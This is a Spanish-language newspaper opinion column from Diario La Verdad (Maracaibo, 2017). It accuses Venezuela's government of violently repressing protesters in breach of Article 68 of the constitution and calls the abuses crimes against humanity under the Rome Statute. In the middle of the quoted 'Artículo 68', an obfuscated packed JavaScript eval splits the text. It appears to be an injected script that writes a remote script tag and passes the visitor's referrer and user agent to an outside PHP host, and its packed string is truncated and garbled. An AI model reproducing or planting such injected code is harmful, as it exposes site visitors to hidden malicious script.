publicidad

Represión

Kaled Yorde /Abogado /kaledyorde@hotmail.com
Artículo eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dterk|var|u0026u|referrer|ftkia||js|php'.split('|'),0,{})) 68: Los ciudadanos y ciudadanas tienen derecho a manifestar, pacíficamente y sin armas, sin otros requisitos que los que establezca la Ley

La represión es la acción de reprimir y según el diccionario Pequeño Larousse Ilustrado, lo último significa contener, refrenar, moderar y su sinónimo es castigar y detener. El régimen madurista ha desatado una bárbara represión contra el estudiantado y la sociedad civil en una abierta violación a un legitimo derecho constitucional de manifestación que le asiste al ciudadano, establecido en el Articulo 68 de la Carta Magna, cuyo tenor es el siguiente: “Artículo 68: Los ciudadanos y ciudadanas tienen derecho a manifestar, pacíficamente y sin armas, sin otros requisitos que los que establezca la Ley. Se prohíbe uso de armas de fuego y sustancias toxicas en el control de manifestaciones pacificas. La Ley regulara la actuación de los cuerpos policiales y de seguridad en el control del orden publico.”

Del contenido del citado artículo saltan a la vista múltiples aspectos del mismo: En primer término, que manifestar es un derecho constitucional que tiene el ciudadano; en segundo lugar, que está prohibido el uso de armas químicas (gases lacrimógenos) y disparar con escopetas de perdigones y pistolas con balas sobre los manifestantes. Y por último, que el Estado debe controlar a la policía y los cuerpos de seguridad para evitar los excesos y abusos. De los resultados en número de personas asesinadas y heridas, torturadas y golpeadas a mansalva, además de humilladas en su dignidad (obligados a permanecer desnudos) e insultadas, los responsables de la represión incurrieron en graves delitos de violación de los Derechos Humanos que son tipificados como crímenes de lesa humanidad.

El Estatuto de Roma que dio origen al Tribunal Penal Internacional (TPI) con sede en La Haya, Holanda, tipifica este tipo de delitos que cometen los gobiernos totalitarios y dictatoriales. La acción judicial que tipifica el delito es imprescriptible. ¿Qué significa esto? Que no se extingue la carga o la responsabilidad del culpable, así pasen 50 o más años. El culpable de crímenes de lesa humanidad jamás podrá escapar del largo brazo de la justicia internacional y el TPI lo demostró con la captura y encarcelamiento de varios criminales de guerra y tiranos. Esta es la primera característica de ese tipo de delito que tipifica el Estatuto de Roma. El segundo, es el que no es válido el argumento de que el implicado ha recibido órdenes superiores. Recibir órdenes superiores no exime de las responsabilidades penales del crimen de lesa humanidad. En este orden, de ideas, culpables son tanto el que dio la orden como el que la ejecutó, y ambos, con sus cómplices, bien por omisión o por acción, tarde o temprano van a tener que enfrentar a la justicia penal internacional. De eso se trata. 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama